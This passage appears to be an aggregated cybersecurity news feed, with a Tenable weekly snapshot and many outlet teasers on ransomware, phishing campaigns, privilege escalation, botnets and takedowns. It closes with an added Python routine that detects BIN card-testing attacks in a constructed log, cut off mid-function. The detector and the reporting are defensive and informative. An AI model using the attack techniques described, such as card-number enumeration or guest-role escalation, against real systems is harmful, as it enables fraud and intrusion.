SC World recently noted that there were three points missing from agentic AI conversations at RSAC. I agree. Many new technologies arrive with significant fanfare. Agentic AI is no exception. However, we must prioritize practical validation over promises. Without thorough proof of concepts (PoCs), our security operations cannot truly integrate these tools. Without clear ROI metrics, we cannot justify the investment. Our long-term security posture depends on this disciplined approach.
The post Cybersecurity Insights with Contrast CISO David Lindner | 05/30/25 appeared first on Security Boulevard.
Check out ETSI’s new global standard for securing AI systems and models. Plus, learn how CISOs and their teams add significant value to orgs’ major initiatives. In addition, discover what webinar attendees told Tenable about their cloud security challenges. And get the latest on properly decommissioning tech products; a cyber threat targeting law firms; and more!
Dive into six things that are top of mind for the week ending May 30.
What is the proper way to secure your artificial intelligence models and systems? Are you confused by all the different AI security recommendations and guidance? The European Telecommunications Standards Institute (ETSI) is trying to bring clarity to this issue.
ETSI, in collaboration with the U.K. National Cyber Security Center (NCSC) and the U.K. Department for Science, Innovation & Technology (DSIT), has published a global standard for AI security designed to cover the full lifecycle of an AI system.
Aimed at developers, vendors, operators, integrators, buyers and other AI stakeholders, ETSI’s “Securing Artificial Intelligence (SAI); Baseline Cyber Security Requirements for AI Models and Systems” technical specification outlines a set of foundational security principles for an AI system’s entire lifecycle.
Here's an overview of the five stages of an AI system and the 13 security principles that must be adopted:
Each one of the 13 security principles is further broken down into multiple provisions that provide detailed requirements.
For example, in the secure maintenance stage, ETSI calls for developers to test and evaluate major AI system updates as they would a new version of an AI model. Also in this stage, system operators need to analyze system and user logs to detect security issues such as anomalies and breaches.
The 73-page companion technical report, “Securing Artificial Intelligence (SAI): Guide to Cyber Security for AI Models and Systems,” offers significantly more technical detail about each provision.
Together the technical specification and the technical report “provide stakeholders in the AI supply chain with a robust set of baseline security requirements that help protect AI systems from evolving cyber threats,” reads an NCSC blog.
For more information about AI security, check out these Tenable resources:
Cybersecurity teams’ involvement in large-scale organizational initiatives yields significant monetary benefits – especially if CISOs are incorporated early into these efforts.
That’s a key finding from Ernst & Young’s “2025 EY Global Cybersecurity Leadership Insights Study,” which surveyed 550 C-suite and cybersecurity leaders globally from organizations with more than $1 billion in annual revenue.
Specifically, the study found that cybersecurity teams contribute a median of $36 million to every enterprise-wide initiative they’re involved in. That’s equivalent to between 11% and 20% of the value of each project.
“CISOs who are involved early in cross-function decision-making generate more value than those who were consulted late or not at all,” the report reads.
“CEOs, CFOs and boards should take steps to more meaningfully integrate cybersecurity into transformations and other strategic initiatives,” it adds.
The finding points to how CISOs and their cybersecurity teams are expanding their scope from managing security, risk and compliance to becoming “key enablers of business growth.”
Unfortunately, over the past two years, cybersecurity budgets have shrunk as a percentage of annual revenue, and only 13% of surveyed CISOs said they get looped in early into critical business decisions.
Using a framework, the report concluded that cybersecurity adds considerable value to these six key types of initiatives:
For more information about how CISOs and their cyber teams add value to business ventures:
During our recent webinar “Confident in the Cloud: How to Overcome Complexity and Get AWS Security Right,” we asked attendees about their cloud security practices and challenges. Check out what they said.
(137 webinar attendees polled by Tenable, May 2025)
(60 webinar attendees polled by Tenable, May 2025)
Interested in learning about proven best practices for how to control and secure your AWS environment? Watch this webinar on-demand!
It’s important to properly dispose of software and hardware products after removing them from your IT environment.
To help organizations with this process, the U.K. National Cyber Security Centre (NCSC) has published guidance on how to securely retire obsolete technical wares.
“Decommissioning can be highly expensive and complex, with potentially severe repercussions if not executed properly,” the NCSC document reads. “Outdated or unsupported assets can pose an unacceptable risk to the organisation.”
For example, an improperly decommissioned IT product could allow unauthorized people to access confidential data and could be used to breach services and devices.
The NCSC guidance, titled “Decommissioning assets,” addresses topics including:
For more information about properly disposing of obsolete hardware and software:
Hacker group Silent Ransom is targeting law firms via phishing calls and emails aimed at tricking employees into granting it remote access to their computers. Once they gain remote access, the attackers steal confidential data and use it to extort the victims.
So said the U.S. Federal Bureau of Investigation (FBI) in an alert titled “Silent Ransom Group Targeting Law Firms.”
Silent Ransom, also known as Luna Moth, Chatty Spider and UNC3753, employs two different schemes:
Detecting a Silent Ransom attack is difficult. Its hackers don’t leave behind traditional attack indicators because they use legitimate remote-access and systems-management tools. Thus, to spot a Silent Ransom breach, the FBI recommends looking for:
To mitigate the threat, FBI recommendations include:
For more information about remote access attacks:
The Center for Internet Security has updated its CIS Benchmarks for Kubernetes, Azure Kubernetes Service and Microsoft Intune, and has released a new CIS Benchmark for Red Hat Enterprise Linux Security Technical Implementation Guide (STIG).
These are the CIS Benchmarks updated in April:
Meanwhile, the brand new Benchmark is CIS Red Hat Enterprise Linux 9 STIG Benchmark v1.0.0.
Organizations can use the CIS Benchmarks’ secure-configuration guidelines to harden products against attacks. Currently, there are more than 100 Benchmarks for 25-plus vendor product families in categories including:
To get more details, read the CIS blog “CIS Benchmarks May 2025 Update.” For more information about the CIS Benchmarks list, check out its home page, as well as:
CIS Benchmarks
The post Cybersecurity Snapshot: New Standard for AI System Security Published, While Study Finds Cyber Teams Boost Value of Business Projects appeared first on Security Boulevard.
Two critical vulnerabilities affecting the open-source forum software vBulletin have been discovered, with one confirmed to be actively exploited in the wild. [...]
Microsoft announced today that the Windows 11 Notepad application is getting a text formatting feature supporting Markdown-style input. [...]
An international law enforcement operation has taken down AVCheck, a service used by cybercriminals to test whether their malware is detected by commercial antivirus software before deploying it in the wild. [...]
The Federal Criminal Police Office of Germany (Bundeskriminalamt or BKA) claims that Stern, the leader of the Trickbot and Conti cybercrime gangs, is a 36-year-old Russian named Vitaly Nikolaevich Kovalev. [...]
Pentesting isn't just about finding flaws — it's about knowing which ones matter. Pentera's 2025 State of Pentesting report uncovers which assets attackers target most, where security teams are making progress, and which exposures still fly under the radar. Focus on reducing breach impact, not just breach count. [...]
Mozilla has rolled out an emergency Firefox 139.0.1 update after the Tuesday release caused graphical artifacts on PCs with NVIDIA GPUs. [...]
The Microsoft Authenticator app is now issuing notifications warning that the password autofill feature is being deprecated in July, suggesting users move to Microsoft Edge instead. [...]
IT management software firm ConnectWise says a suspected state-sponsored cyberattack breached its environment and impacted a limited number of ScreenConnect customers. [...]
Threat actors are abusing the trusted Google platform 'Google Apps Script' to host phishing pages, making them appear legitimate and eliminating the risk of them getting flagged by security tools. [...]
A weakness in Apple's Safari web browser allows threat actors to leverage the fullscreen browser-in-the-middle (BitM) technique to steal account credentials from unsuspecting users. [...]
The U.S. Treasury Department has sanctioned Funnull Technology, a Philippines-based company that supports hundreds of thousands of malicious websites behind cyber scams linked to over $200 million in losses for Americans. [...]
Threat actors linked to lesser-known ransomware and malware projects now use AI tools as lures to infect unsuspecting victims with malicious payloads. [...]
Attackers are mapping your infrastructure before you even realize what's exposed. Sprocket ASM flips the script — giving you the same recon capabilities they use, plus change detection and actionable insights to close gaps fast. See your attack surface the way hackers do and beat them to it. [...]
At the Android Show, taking place ahead of Google I/O 2025, Google announced that it is adding new device-specific features to its Advanced Protection program, which is designed to protect public figures such as politicians and journalists from different digital threats, with the Android 16 release. The new features include a new way of storing […]
At the Android Show on Tuesday, ahead of Google I/O, Google announced new security and privacy features for Android. These new features include new protections for calls, screen sharing, messages, device access, and system-level permissions. With these features, Google aims to protect users from falling for a scam, keep their details secure in case a […]
If you ever call 911 from an area that’s hard to get to, you might hear the buzz of a drone well before a police cruiser pulls up. And there’s a good chance that it will be one made by Brinc Drones, a Seattle-based startup founded by 25-year-old Blake Resnick, who dropped out of college […]
A new security fund aims to help apps in the fediverse — like Mastodon, Threads, and Pixelfed — to pay researchers for disclosing security bugs.
This is a guide on how to check whether someone compromised your online accounts.
Threat intelligence startup GreyNoise says it has observed a ‘notable resurgence’ in attack activity
PSEA says it "took steps to ensure" its stolen data was deleted, suggesting a ransom demand was paid
Federal court rules U.S. cybersecurity agency must re-hire over 100 former employees
Affected staff say more than 100 employees working to protect U.S. government networks were ‘axed’ with no prior warning
New details have emerged about PowerSchool's data breach — but here's what PowerSchool still isn't saying.
CrowdStrike says a hacker had access to PowerSchool's internal system as far back as August.
Unidentified hackers breached NTT Com’s network to steal personal information of employees at thousands of corporate customers
The FBI is warning that scammers are impersonating the BianLian ransomware gang using fake ransom notes sent to U.S. corporate executives. The fake ransom notes, first reported by U.S. cybersecurity company GuidePoint Security, claim that hackers have gained access to an organization’s network to steal sensitive data, and threaten to publish the stolen data unless […]
The UK is no longer recommending the use of encryption for at-risk groups following its iCloud backdoor demands
Security experts warn of ‘huge impact’ of actively exploited hypervisor flaws that allow sandbox escape
The reported policy shift comes as the U.S. government signals a change in its threat assessment of Russia
In a TikTok video with over 3 million views, a woman in a fluffy, maximalist coat sits in the back seat of a luxury SUV, parked in the middle of a New York City street. Atop the 6-second video, a line of text reads, “our bodyguards got us matcha.” The camera zooms in on two […]
The hackers reportedly exploited a flaw in US cybersecurity firm Barracuda’s software to access VSSE's email server
When it comes to AI software, you can build something clever, but that’s not always the same as building something that is secure. With so much software now getting written by AI, having a window into its security can be a challenge. That’s the premise of Archipelo, a San Francisco-based cybersecurity startup that is today […]
Genea gets a court injunction after ransomware gang Termite claims to have leaked patient information
Video games are more than entertainment; they’re a $200 billion global industry. But as gaming grows, so do cyberattacks. Hackers now see games as goldmines for stealing data, extorting companies, and exploiting players. According to Infosecurity Magazine, Akamai’s 2024 report shows that attacks on gaming platforms are rising alarmingly. In 2024 alone, the industry suffered … Continue reading Gamer Over? Why Hackers Target Popular Video Games & How to Stay Safe
The post Gamer Over? Why Hackers Target Popular Video Games & How to Stay Safe appeared first on KoDDoS Blog.
Social media is all around us, helping us stay connected, updated, and entertained. But beneath the endless scroll, a darker reality exists. Hidden cybersecurity threats are growing, some obvious, others much harder to spot. The risks are especially alarming for young users. According to the National Institutes of Health, up to 95% of teens aged … Continue reading How Social Media Use Can Create Hidden Cybersecurity Risks
The post How Social Media Use Can Create Hidden Cybersecurity Risks appeared first on KoDDoS Blog.
From April 1st to 3rd, 2025, KoDDoS, a provider of specialized services in DDoS protection and secure offshore hosting, marked its presence at the InCyber Europe Forum, held at the Lille Grand Palais. A true crossroads of cyber innovation and cooperation, the event is the largest cybersecurity event in Europe. A benchmark event on an … Continue reading KoDDoS at the InCyber Europe 2025 Forum: a strategic participation at the heart of the European cyber ecosystem
The post KoDDoS at the InCyber Europe 2025 Forum: a strategic participation at the heart of the European cyber ecosystem appeared first on KoDDoS Blog.
CloudFest is one of the world’s largest cloud computing events. Every year, it brings together the industry’s leading players to discuss the latest technological advancements, emerging trends, and market challenges. In 2025, the event once again cemented its leadership status by providing a dynamic platform for professional exchange and cloud innovation. This edition featured captivating … Continue reading Looking back at CloudFest 2025: An essential event for the future of the cloud!
The post Looking back at CloudFest 2025: An essential event for the future of the cloud! appeared first on KoDDoS Blog.
KoDDoS recently strengthened its commitment to the European tech scene by participating in several major events in France. Our team was honored to be invited to key gatherings in the tech industry, highlighting the importance of innovation and cybersecurity in the evolving digital ecosystem. This strategic tour in Paris allowed us to meet top-tier partners, … Continue reading KoDDoS in Europe: A Strong Presence at Major Tech Events in Paris.
The post KoDDoS in Europe: A Strong Presence at Major Tech Events in Paris. appeared first on KoDDoS Blog.
The post KoDDos Will be at CyberShow 2025 in Paris! appeared first on KoDDoS Blog.
🚀 Cutting-Edge Services KoDDoS has established itself as a key player in the field of high-performance hosting. Specializing in anti-DDoS protection, we ensure unmatched service continuity for our clients in the face of growing threats targeting digital infrastructures. We also invest in groundbreaking technologies, including Web3, blockchain, and the Internet of Things (IoT), providing tailored … Continue reading Technological innovation in the heart of Los Angeles at the CES 2025 🚀
The post Technological innovation in the heart of Los Angeles at the CES 2025 🚀 appeared first on KoDDoS Blog.
To meet growing demand and accelerate our growth, we are launching a new sales team. We are looking for talented, ambitious, and motivated B2B sales representatives and business introducers who share our vision of a safer and more resilient internet. Job Profile: Position: B2B Sales Representatives and Business Introducers. As a key member of our Sales Team, you will … Continue reading Recruitment Announcement: B2B Sales Representatives and Business Introducers
The post Recruitment Announcement: B2B Sales Representatives and Business Introducers appeared first on KoDDoS Blog.
The countdown has begun! There are only 3 days left to take advantage of our Halloween special and enjoy 10% off on all our hosting and DDoS protection services. Don’t miss this limited-time offer to secure your website with KoDDoS’s high-performance solutions at a great price! 🎃 Promo Code: HALLOWEEN2024 🎃 Use code HALLOWEEN2024 at … Continue reading ⏳ Only 3 Days Left to Grab 10% Off on All KoDDoS Services! 🎃
The post ⏳ Only 3 Days Left to Grab 10% Off on All KoDDoS Services! 🎃 appeared first on KoDDoS Blog.
Read MoreDistributed Denial of Service (DDoS) attacks represent one of the most formidable threats to modern businesses and organizations whose information systems are connected to the internet. These attacks aim to render a service unavailable by overwhelming the target server’s resources with a massive volume of malicious traffic from multiple sources. In the face of this … Continue reading Understanding and Preventing DDoS Attacks with KoDDoS
The post Understanding and Preventing DDoS Attacks with KoDDoS appeared first on KoDDoS Blog.
Read MoreA startling discovery by BeyondTrust researchers has unveiled a critical vulnerability in Microsoft Entra ID and Azure environments, where attackers can exploit lesser-known billing roles to escalate privileges within organizational tenants. This sophisticated attack vector leverages the ability of guest users, often invited for collaboration with limited permissions, to create and control Azure subscriptions in […]
The post Attackers Exploit Microsoft Entra Billing Roles to Escalate Privileges in Organizational Environments appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Read MoreThe Cofense Phishing Defense Center has uncovered a highly strategic phishing campaign that leverages Google Apps Script, a legitimate development platform within Google’s ecosystem, to host deceptive phishing pages. This attack, masquerading as an invoice email, exploits the inherent trust users place in Google’s environment to trick recipients into divulging sensitive information. A Sophisticated […]
The post Threat Actors Exploit Google Apps Script to Host Phishing Sites appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Read MoreCybersecurity researchers from Trustwave’s Threat Intelligence Team have uncovered a large-scale phishing campaign orchestrated by the notorious hacker group Storm-1575, also known as “Dadsec.” Since September 2023, this group has been leveraging a Phishing-as-a-Service (PhaaS) platform called Tycoon2FA to target Microsoft 365 users, aiming to harvest credentials through meticulously crafted phishing pages. This campaign, active […]
The post Dadsec Hacker Group Uses Tycoon2FA Infrastructure to Steal Office365 Credentials appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Read MoreCisco Talos has uncovered a series of malicious threats masquerading as legitimate AI tool installers, targeting unsuspecting users and businesses across multiple industries. These threats, including the CyberLock and Lucky_Gh0$t ransomware families, along with a newly identified destructive malware dubbed “Numero,” exploit the growing popularity of AI solutions in sectors like B2B sales, technology, and […]
The post Beware: Weaponized AI Tool Installers Infect Devices with Ransomware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Read MorePure Crypter, a well-known malware-as-a-service (MaaS) loader, has been identified as a crucial tool for threat actors targeting Windows-based systems in technical research carried out by eSentire’s Threat Response Unit (TRU) during 2024 and 2025. This loader, favored for deploying information stealers like Lumma and Rhadamanthys via the ClickFix initial access vector, has […]
The post Pure Crypter Uses Multiple Evasion Methods to Bypass Windows 11 24H2 Security Features appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Read MoreA recent discovery by security researchers at BeyondTrust has revealed a critical, yet by-design, security gap in Microsoft Entra ID that could allow external guest users to gain powerful control over Azure environments. Contrary to common assumptions, Entra B2B guest accounts—typically used for collaboration with external partners—can leverage specific billing roles to create and transfer […]
The post Attackers Exploit Microsoft Entra Billing Roles to Escalate Privileges appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Read MoreMicrosoft has exposed the escalating sophistication of phishing attacks, particularly focusing on Adversary-in-the-Middle (AiTM) techniques that are becoming a cornerstone of modern cyber threats. As organizations increasingly adopt multifactor authentication (MFA), passwordless solutions, and robust email protections, threat actors are adapting with advanced methods to steal credentials, especially targeting enterprise cloud environments. AiTM attacks, often […]
The post Microsoft Reveals Techniques for Defending Against Evolving AiTM Attacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Read MoreA critical vulnerability (CVE-2025-48057) has been discovered in Icinga 2, the widely used open-source monitoring platform. The flaw, affecting installations built with OpenSSL versions older than 1.1.0, could allow attackers to obtain valid certificates from the Icinga Certificate Authority (CA), potentially impersonating trusted nodes and compromising monitoring environments. Security updates have been released in versions […]
The post Critical Icinga 2 Vulnerability Allows Attackers to Obtain Valid Certificates appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Read MoreHackers have been targeting Internet cafés in South Korea since the second half of 2024, exploiting specialized management software to install malicious tools for cryptocurrency mining. According to a detailed report from AhnLab SEcurity intelligence Center (ASEC), the attackers, active since 2022, are using the notorious Gh0st RAT (Remote Access Trojan) to seize control of […]
The post Hackers Use Gh0st RAT to Hijack Internet Café Systems for Crypto Mining appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Read MoreA recent Windows 11 security update, KB5058405, released on May 13, 2025, has caused significant boot failures for some users running Windows 11 versions 22H2 and 23H2—especially in enterprise and virtual environments. Affected systems display a recovery error with code 0xc0000098, specifically referencing the ACPI.sys file, a crucial kernel-mode driver responsible for power management and […]
The post Windows 11 Security Update for 22H2 & 23H2 May Cause Recovery Errors appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Read MoreAVCheck and related crypting services helped cybercriminals make malware difficult to detect and confirm that malware could slip through various antivirus tools undetected, officials said.
The post Top counter antivirus service disrupted in global takedown appeared first on CyberScoop.
Read MoreThe 28-year-old, who’d been employed by the Defense Intelligence Agency since 2019, specialized in insider threats and had top secret security clearance, officials said.
The post US intelligence employee arrested for alleged double-dealing of classified info appeared first on CyberScoop.
Read MoreThe lawmakers say the January purge has left the United States blind on the nature of the historic Salt Typhoon telecommunications breach.
The post Four Senate Democrats call on DHS to reinstate Cyber Safety Review Board membership appeared first on CyberScoop.
Read MoreThe defendants will increase reporting on spoofing, create a compliance team or AI and conduct regular training for staff on how to identify deceptive messages and the dangers of misinformation in U.S. elections.
The post Parties behind 2024 Biden AI robocall reach deal in lawsuit appeared first on CyberScoop.
Read MoreThe Philippines-based company Funnull operated a large cybercrime platform encompassing more than 332,000 domains, the FBI said.
The post Treasury sanctions crypto scam facilitator that allegedly stole $200M from US victims appeared first on CyberScoop.
Read MoreThe besieged security vendor maintains the latest exploited vulnerabilities in its products are entirely linked to unspecified security issues in open-source libraries. Some researchers aren’t buying it.
The post Questions mount as Ivanti tackles another round of zero-days appeared first on CyberScoop.
Read MoreGoogle Threat Intelligence Group said it developed means to counter the activity, which it linked to APT41.
The post Chinese hackers used Google Calendar to aid attacks on government entities appeared first on CyberScoop.
Read MoreSina Gholinejad pleaded guilty to two counts in a scheme that most visibly hit the city of Baltimore, causing $19 million in damages.
The post Iranian man pleads guilty in Robbinhood ransomware scheme appeared first on CyberScoop.
Read MoreThe deal reflects a growing trend in cybersecurity toward consolidation and integration.
The post Zscaler acquires Red Canary for boost in AI-driven security operations appeared first on CyberScoop.
Read MoreA Vietnam-based group has spread thousands of advertisements, fake websites and social media posts promising access to popular prompt-to-video AI generation tools, delivering infostealers and backdoors instead.
The post Mandiant flags fake AI video generators laced with malware appeared first on CyberScoop.
Read MoreMeta stopped three covert operations from Iran, China, and Romania using fake accounts to spread propaganda on social media platforms. Meta announced the disruption of three influence operations from Iran, China, and Romania using fake accounts to spread propaganda and manipulate discourse on Facebook, Instagram, and more. The social media giant pointed out that it […]
Read MoreThe U.S. sanctioned Funnull Technology and Liu Lizhi for aiding romance scams that caused major crypto losses through fraud infrastructure. The U.S. Department of Treasury’s Office of Foreign Assets Control (OFAC) sanctioned Philippines-based company Funnull Technology Inc. and its admin Liu Lizhi for enabling romance scams, causing $200M in U.S. victim losses. A romance scam […]
Read MoreConnectWise detected suspicious activity linked to a nation-state actor, impacting a small number of its ScreenConnect customers. ConnectWise revealed it had detected suspicious activity linked to an advanced nation-state actor. The company confirmed that the attack impacted a small number of its ScreenConnect customers. “ConnectWise recently learned of suspicious activity within our environment that we […]
Read MoreVictoria’s Secret took its website offline after a cyberattack, with experts warning of rising threats against major retailers. American lingerie, clothing, and beauty retailer Victoria’s Secret took its website offline following a cyberattack. At this time, the site shows the following message: “Valued customer, we identified and are taking steps to address a security incident. […]
Read MoreGoogle says China-linked group APT41 controlled malware via Google Calendar to target governments through a hacked site. Google warns that China-linked APT41 used TOUGHPROGRESS malware with Google Calendar as C2, targeting various government entities via a compromised website. ” In late October 2024, GTIG discovered an exploited government website hosting malware being used to target multiple […]
Read MoreGreyNoise researchers warn of a new botnet, AyySSHush, that has compromised over 9,000 ASUS routers and added a persistent SSH backdoor to each. GreyNoise discovered that the AyySSHush botnet has hacked over 9,000 ASUS routers, adding a persistent SSH backdoor. “Using an AI powered network traffic analysis tool we built called SIFT, GreyNoise has caught multiple anomalous network payloads with zero-effort that […]
Read MoreThe Czech government condemned China after linking cyber espionage group APT31 to a cyberattack on its critical infrastructure. The Czech government strongly condemned China after the cyber espionage group APT31 was linked to a cyberattack targeting the nation’s critical infrastructure. The Czech government condemned China after APT31 hackers infiltrated a ministry’s unclassified system in 2022 […]
Read MorePumaBot targets Linux IoT devices, using SSH brute-force attacks to steal credentials, spread malware, and mine crypto. Darktrace researchers discovered a new botnet called PumaBot targets Linux-based IoT devices, using SSH brute-force attacks to steal credentials, spread malware, and mine cryptocurrency. PumaBot skips broad internet scans and instead pulls a list of targets from its […]
Read MoreApple blocked over $9B in fraud in 5 years, including $2B in 2024, stopping scams from deceptive apps to fake payment schemes on the App Store. In the past five years alone, Apple says it has blocked over $9 billion in fraudulent transactions, more than $2 billion of that in 2024, highlighting its ongoing efforts […]
Read MoreResearchers found a fake Bitdefender site spreading the Venom RAT by tricking users into downloading it as antivirus software. DomainTools Intelligence (DTI) researchers warn of a malicious campaign using a fake website (“bitdefender-download[.]com”) spoofing Bitdefender’s Antivirus for Windows download page to trick visitors into downloading a remote access trojan called Venom RAT. “A malicious campaign […]
Read MoreCompanies want results fast, and low/no-code (LCNC) and Vibe Coding platforms promise just that: rapid application development with either no coding or AI-generated coding. LCNC and Large Language Model (LLM) Vendors quickly release products to get ahead in the AI race. Organizations procure these products to implement right away aiming for quick returns on investment […]
The post Smarter Defenses: How AI Improves Security for Low/No-Code and Vibe Coded Applications appeared first on IT Security Guru.
Read MoreWith Infosecurity Europe around the corner next week, planning your schedule can be tricky. But never fear! The Gurus have been busy collecting a selection of unmissable events to help you plan your days and ensure you get the most out of your visit. First up: the talks. And there are a lot to choose […]
The post IT Security Guru picks for Infosecurity Europe 2025 appeared first on IT Security Guru.
Read MoreCheck Point has announced significant advancements to its Quantum Force Security Gateways family. As a result, all Quantum Force Security Gateways for data centres and perimeters are set to receive a 15-25% performance uplift in threat prevention throughput, delivered automatically via a software update. In parallel, Check Point is rolling out a new line-up of […]
The post Check Point Launches Next-Gen Branch Office Security, Boosting Threat Prevention Speed by 4x appeared first on IT Security Guru.
Read MoreCheck Point Software has announced the launch of its next generation Quantum Smart-1 Management Appliances. These appliances deliver 2X increase in managed gateways and up to 70% higher log rate, with AI-powered security tools designed to meet the demands of hybrid enterprises. Fully integrated within the Check Point Infinity Platform, they offer faster, more intelligent […]
The post Check Point Enhances Enterprise Security with AI-Driven Threat Management appeared first on IT Security Guru.
Read MoreCheck Point Software has announced a definitive agreement to acquire Veriti Cybersecurity, the first fully automated, multi-vendor pre-emptive threat exposure and mitigation platform. The acquisition aims to respond to the uptick in AI-fuelled attacks facing organisations, as well as the increasing connectivity of IT environments. Founded in 2021, Veriti pioneered the Preemptive Exposure Management (PEM) […]
The post Check Point to Acquire Veriti to Transform Threat Exposure Management appeared first on IT Security Guru.
Read MoreIn today’s digital workplaces, more employees are building their own applications by generating code using Low Code No Code (LCNC), Artificial Intelligence (AI) and Large Language Model (LLM) tools instead of manually writing lines of code. These employees are called vibe coders. Vibe Coders prompt LCNC and AI tools using natural language prompts to generate […]
The post Finding the right balance between ‘vibe coders’ and security appeared first on IT Security Guru.
Read MoreKeeper Security, the cybersecurity provider of zero-trust and zero-knowledge Privileged Access Management (PAM) software protecting passwords, passkeys, privileged accounts, secrets and remote connections, is pleased to announce that security industry veteran Shane Barney has been appointed Chief Information Security Officer (CISO). Shane joins Keeper from the U.S. Citizenship and Immigration Services (USCIS), where he served […]
The post Keeper Security appoints new CISO appeared first on IT Security Guru.
Read MoreAPI security organisation Salt Security has announced its expanded partnership and new integration with Wiz, the leader in cloud security. The integration between Salt Security and Wiz enables organisations to detect, comprehend, and respond to both API security posture gaps and critical risks directly within their cloud security infrastructure. The complexity and size of modern […]
The post Salt Security Partners With Wiz, Combines Cloud and API Security appeared first on IT Security Guru.
Read MoreThe European Union Agency for Cybersecurity (ENISA) has unveiled the European Vulnerability Database (EUVD), a strategic move designed to enhance digital security across the bloc and reduce reliance on U.S.-centric cybersecurity infrastructure. The EUVD, now live for consultation, aggregates vulnerability data from a wide range of sources, including national Computer Security Incident Response Teams (CSIRTs), […]
The post ENISA Launches European Vulnerability Database to Bolster EU Cyber Resilience appeared first on IT Security Guru.
Read MoreDescribed as revolutionary and disruptive, AI agents are the new cornerstone of innovation in 2025. But as with any technology standing on the cutting edge, this evolution isn’t without its trade-offs. Will this new blend of intelligence and autonomy really introduce a new era of efficiency? Or does the ability for AI Agents to act […]
The post AI Agents: Transformative or Turbulent? appeared first on IT Security Guru.
Read MoreCybereason issues Threat Alerts to inform customers of emerging impacting threats, critical vulnerabilities and attacker campaigns. Cybereason Threat Alerts summarize these threats and provide practical recommendations for protecting against them.
Read MoreCybereason GSOC has identified a malware infection exhibiting strong similarities to the previously reported Genesis Market malicious campaign that was dismantled by law enforcement in early 2023.
Read MoreThis article is a continuation of the previous research published on the malware LummaStealer: "Your Data Is Under New Lummanagement: The Rise of LummaStealer".
Read MoreBetween 2022 and 2024, data breach-related class actions in the United States surged by over 146%, with the top 10 settlements in 2024 averaging 15% higher than in 2023. As organizations grapple with increasingly aggressive litigation stemming from cybersecurity incidents, class action lawsuits have become a major risk vector—one that now rivals the breach itself in terms of financial, operational, and reputational impact, underscoring the importance of both proactive cybersecurity posture and a strong defensive strategy in litigation. Whether it’s demonstrating reasonable security practices or disputing claims of harm resulting from cybersecurity incidents, the involvement of technical experts has become critical.
Read MoreCybereason issues Threat Analysis reports to investigate emerging threats and provide practical recommendations for protecting against them. In this Threat Analysis report, Cybereason investigates the new Ransomware-as-a-Service (RaaS) known as PlayBoy Locker and how to defend against it through the Cybereason Defense Platform.
Read MoreSkip ahead if you have heard this story, but when I started in anti-virus at Dr Solomon’s, Alan Solomon would share how he moved from doing hard disk data recoveries into antivirus because he received a drive to recover and recognized the corruption was logical. As such, to fix the damage, he wrote an algorithm (he was a mathematician by education) to undo the corruption. A few months later he was recovering another drive and recognized the same logical corruption, which led him to write a new algorithm to detect this corruption; this was how he started Dr Solomon’s antivirus software. The point here is that traditional anti-virus has always been based on pattern matching. Find something unique to each attack in its code, then you can write an algorithm, or, as it is more commonly called these days, a signature, to detect, block and repair the attack. I remember Alan saying effectively that signatures had solved the virus problem: the volume would continue to grow, as would the complexity, but the same signature solution would always apply.
Read MoreThreat actors with financial motivations often leverage BIN attacks when targeting financial services or eCommerce victims. BIN attacks involve threat actors systematically testing card numbers stemming from a Bank Identification Number (BIN) to find valid card details. BIN values are assigned to card issuers and form the first 6-8 digits on payment cards. These values are published to merchants, payment processors, and other service providers to facilitate transactions and are publicly available. The BIN is then followed by an additional set of numbers (the account number) to form a complete Primary Account Number (PAN), or card number.
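An added example, not part of the original post: the Python below runs the detection logic a payment processor or merchant would want against the behaviour described above. It groups authorisations by (merchant, BIN), slides a time window over them, and raises one alert per pair when many distinct cards behind one BIN are tried with a high decline rate. The log format, merchant identifiers, tokenised PANs, the 8-digit BIN split and the thresholds are all assumptions; the log lines are constructed and the BINs are chosen to resemble well-known test ranges rather than any issuer.

```python
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta

AuthEvent = namedtuple("AuthEvent", "ts merchant bin token amount result")

# Constructed authorisation log (no real card data):
# timestamp  merchant  8-digit BIN  tokenised PAN  amount  result
SAMPLE_AUTH_LOG = """\
2025-05-30T10:00:01 m-4411 40000000 tok-a1 1.00 DECLINED
2025-05-30T10:00:09 m-4411 40000000 tok-a2 1.00 DECLINED
2025-05-30T10:00:17 m-4411 40000000 tok-a3 1.00 DECLINED
2025-05-30T10:00:26 m-4411 40000000 tok-a4 1.00 APPROVED
2025-05-30T10:00:33 m-4411 40000000 tok-a5 1.00 DECLINED
2025-05-30T10:00:41 m-4411 40000000 tok-a6 1.00 DECLINED
2025-05-30T10:00:50 m-4411 40000000 tok-a7 1.00 DECLINED
2025-05-30T10:00:58 m-4411 40000000 tok-a8 1.00 DECLINED
2025-05-30T10:02:10 m-2200 55555555 tok-b1 49.99 APPROVED
2025-05-30T10:31:45 m-2200 55555555 tok-b2 12.50 APPROVED
2025-05-30T10:55:03 m-2200 55555555 tok-b3 88.00 DECLINED
2025-05-30T11:02:19 m-2200 40000000 tok-c1 23.10 APPROVED
"""


def parse_auth_log(text):
    """Parse the constructed whitespace-separated log into AuthEvent records."""
    events = []
    for line in text.strip().splitlines():
        ts, merchant, bin_, token, amount, result = line.split()
        events.append(AuthEvent(datetime.fromisoformat(ts), merchant, bin_,
                                token, float(amount), result))
    return events


def detect_bin_attacks(events, window=timedelta(minutes=10),
                       min_cards=5, min_decline_rate=0.75):
    """Flag (merchant, BIN) pairs that see many distinct cards inside `window`
    with a high decline rate: the signature of an attacker enumerating the
    account-number part of the PAN behind a known BIN. Returns one alert per
    pair, describing the window in which the most distinct cards were seen."""
    by_pair = defaultdict(list)
    for e in events:
        by_pair[(e.merchant, e.bin)].append(e)

    alerts = []
    for (merchant, bin_), evs in sorted(by_pair.items()):
        evs.sort(key=lambda e: e.ts)
        best = None
        start = 0
        for end in range(len(evs)):
            # advance the window start until it spans at most `window`
            while evs[end].ts - evs[start].ts > window:
                start += 1
            win = evs[start:end + 1]
            cards = {e.token for e in win}
            rate = sum(e.result == "DECLINED" for e in win) / len(win)
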